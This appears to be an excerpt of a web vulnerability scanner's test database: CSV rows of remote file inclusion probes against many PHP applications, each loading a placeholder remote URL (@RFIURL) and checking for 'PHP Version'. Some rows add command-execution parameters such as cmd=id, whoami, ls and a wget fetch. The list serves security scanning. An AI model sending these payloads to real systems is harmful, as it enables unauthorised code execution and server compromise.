"004649","5292","c","/doceboCore/lib/lib.php?GLOBALS[where_framework]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004650","5292","c","/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004651","5292","c","/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004652","5292","c","/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004653","5292","c","/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004654","5292","c","/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004655","5292","c","/docs/front-end-demo/cart2.php?workdir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004656","5292","c","/dokeos/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=@RFIURL?&cmd=wget%20XXpathXX","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004657","5292","c","/dosearch.php?RESPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004658","5292","c","/download.php?root_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004659","5292","c","/download.php?root_prefix=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004660","5292","c","/download_engine_V1.4.3/addmember.php?eng_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004661","5292","c","/download_engine_V1.4.3/admin/enginelib/class.phpmailer.php?lang_pathr=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004662","5292","c","/download_engine_V1.4.3/admin/includes/spaw/dialogs/colorpicker.php?spaw_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004663","5292","c","/downstat1.8/chart.php?art=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004664","5292","c","/dp_logs.php?HomeDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004665","5292","c","/eXPerience2/modules.php?file=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004666","5292","c","/ea-gBook/index_inc.php?inc_ordner=@RFIURL?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004667","5292","c","/edit.php?javascript_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004668","5292","c","/editor.php?newsfile=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004669","5292","c","/editprofile.php?pathtohomedir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004670","5292","c","/editsite.php?returnpath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004671","5292","c","/editx/add_address.php?include_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004672","5292","c","/elseif/contenus.php?contenus=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004673","5292","c","/elseif/moduleajouter/articles/fonctions.php?tpelseifportalrepertoire=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004674","5292","c","/elseif/moduleajouter/articles/usrarticles.php?corpsdesign=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004675","5292","c","/elseif/moduleajouter/depot/fonctions.php?tpelseifportalrepertoire=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004676","5292","c","/elseif/moduleajouter/depot/usrdepot.php?corpsdesign=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004677","5292","c","/elseif/moduleajouter/depot/usrdepot.php?corpsdesign@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004678","5292","c","/elseif/utilisateurs/coeurusr.php?tpelseifportalrepertoire=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004679","5292","c","/elseif/utilisateurs/commentaire.php?tpelseifportalrepertoire=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004680","5292","c","/elseif/utilisateurs/enregistrement.php?tpelseifportalrepertoire=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004681","5292","c","/elseif/utilisateurs/espaceperso.php?tpelseifportalrepertoire=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004682","5292","c","/elseif/utilisateurs/votes.php?tpelseifportalrepertoire=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004683","5292","c","/email_subscribe.php?root_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004684","5292","c","/email_subscribe.php?root_prefix=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004685","5292","c","/embed/day.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004686","5292","c","/enc/content.php?Home_Path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004687","5292","c","/engine/Ajax/editnews.php?root_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004688","5292","c","/engine/api/api.class.php?dle_config_api=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004689","5292","c","/engine/engine.inc.php?absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004690","5292","c","/engine/init.php?root_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004691","5292","c","/engine/require.php?MY_ENV[BASE_ENGINE_LOC]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004692","5292","c","/enth3/show_joined.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004693","5292","c","/environment.php?DIR_PREFIX=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004694","5292","c","/epal/index.php?view=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004695","5292","c","/errors.php?error=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004696","5292","c","/errors/configmode.php?GALLERY_BASEDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004698","5292","c","/errors/reconfigure.php?GALLERY_BASEDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004699","5292","c","/errors/unconfigured.php?GALLERY_BASEDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004700","5292","c","/es_custom_menu.php?files_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004701","5292","c","/es_desp.php?files_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004702","5292","c","/es_offer.php?files_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004703","5292","c","/eshow.php?Config_rootdir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004704","5292","c","/esupport/admin/autoclose.php?subd=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004705","5292","c","/eva/index.php3?aide=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004706","5292","c","/eva/index.php3?aide=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004707","5292","c","/eva/index.php3?perso=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004708","5292","c","/eva/index.php?eva[caminho]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004709","5292","c","/event.php?myevent_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004710","5292","c","/event_cal/module/embed/day.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004711","5292","c","/eventcal2.php.php?path_simpnews=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004712","5292","c","/eventscroller.php?path_simpnews=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004713","5292","c","/example-view/templates/article.php?globals[content_dir]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004714","5292","c","/example-view/templates/dates_list.php?globals[content_dir]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004715","5292","c","/example-view/templates/root.php?globals[content_dir]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004716","5292","c","/example.php?site=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004717","5292","c","/example/gamedemo/inc.functions.php?projectPath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004718","5292","c","/examplefile.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004719","5292","c","/examples/patExampleGen/bbcodeSource.php?example=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004720","5292","c","/exception/include.php?_APP_RELATIVE_PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004721","5292","c","/extauth/drivers/ldap.inc.php?clarolineRepositorySys=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004722","5292","c","/extras/mt.php?web_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004723","5292","c","/extras/poll/poll.php?file_newsportal=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004724","5292","c","/ezusermanager_pwd_forgott.php?ezUserManager_Path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004725","5292","c","/faq.php?module_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004726","5292","c","/faq.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004727","5292","c","/fckeditor/editor/dialog/fck_link.php?dirroot=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004728","5292","c","/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004729","5292","c","/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?dirroot=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004730","5292","c","/fcring.php?s_fuss=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004731","5292","c","/feed.php?config[root_ordner]=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004732","5292","c","/feed/index2.php?m=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004733","5292","c","/files/amazon-bestsellers.php?CarpPath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004734","5292","c","/files/carprss.php?CarpPath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004735","5292","c","/files/compose-attach.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004736","5292","c","/files/compose-menu.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004737","5292","c","/files/compose-new.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004738","5292","c","/files/compose-send.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004739","5292","c","/files/folder-create.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004740","5292","c","/files/folder-delete.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004741","5292","c","/files/folder-empty.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004742","5292","c","/files/folder-rename.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004743","5292","c","/files/folders.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004744","5292","c","/files/login.php3?err=hack&BSX_HTXDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004745","5292","c","/files/mainfile.php?page[path]=@RFIURL?&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004746","5292","c","/files/mbox-list.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004747","5292","c","/files/message-delete.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004748","5292","c","/files/message-forward.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004749","5292","c","/files/message-header.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004750","5292","c","/files/message-print.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004751","5292","c","/files/message-read.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004752","5292","c","/files/message-reply.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004753","5292","c","/files/message-replyall.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004754","5292","c","/files/message-search.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004755","5292","c","/findix/index.php?page=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004756","5292","c","/fishcart_v3/fc_functions/fc_example.php?docroot=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004757","5292","c","/flushcmd/Include/editor/rich_files/class.rich.php?class_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004758","5292","c","/fonctions/template.php?repphp=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004759","5292","c","/fonctions_racine.php?chemin_lib=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004760","5292","c","/footer.inc.php?settings[footer]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004761","5292","c","/footer.inc.php?tfooter=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004762","5292","c","/footer.inc.php?tfooter=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004763","5292","c","/footer.php?footer_file=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004764","5292","c","/footer.php?op[footer_body]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004765","5292","c","/form.php?path=@RFIURL?&cmd=pwd","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004766","5292","c","/forum.php?cfg_file=1&fpath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004767","5292","c","/forum/forum.php?view=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004768","5292","c","/forum/forum82lib.php3?repertorylevel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004769","5292","c","/forum/gesfil.php?repertorylevel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004770","5292","c","/forum/lostpassword.php?repertorylevel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004771","5292","c","/forum/mail.php?repertorylevel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004772","5292","c","/forum/member.php?repertorylevel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004773","5292","c","/forum/message.php?repertorylevel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004774","5292","c","/forum/search.php?repertorylevel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004775","5292","c","/forum/track.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004776","5292","c","/frame.php?framefile=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004777","5292","c","/ftp.php?path_local=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004778","5292","c","/function.inc.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004779","5292","c","/function.php?adminfolder=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004780","5292","c","/function.php?gbpfad=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004781","5292","c","/functions.php?include_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004782","5292","c","/functions.php?pmp_rel_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004783","5292","c","/functions.php?s[phppath]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004784","5292","c","/functions.php?set_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004785","5292","c","/functions/form.func.php?GLOBALS[PTH][classes]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004786","5292","c","/functions/general.func.php?GLOBALS[PTH][classes]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004787","5292","c","/functions/groups.func.php?GLOBALS[PTH][classes]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004788","5292","c","/functions/js.func.php?GLOBALS[PTH][classes]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004789","5292","c","/functions/prepend_adm.php?SETS[path][physical]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004790","5292","c","/functions/prepend_adm.php?SETS[path][physical]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004791","5292","c","/functions/sections.func.php?GLOBALS[PTH][classes]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004792","5292","c","/functions/users.func.php?GLOBALS[PTH][classes]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004793","5292","c","/functions_mod_user.php?phpbb_root_path=@RFIURL?&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004794","5292","c","/fusebox5.php?FUSEBOX_APPLICATION_PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004795","5292","c","/galerie.php?config[root_ordner]=@RFIURL?cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004797","5292","c","/gallery/lib/content.php?include=@RFIURL?cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004798","5292","c","/gallery/theme/include_mode/template.php?galleryfilesdir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004799","5292","c","/gallerypath/index.php?includepath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004800","5292","c","/games.php?id=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
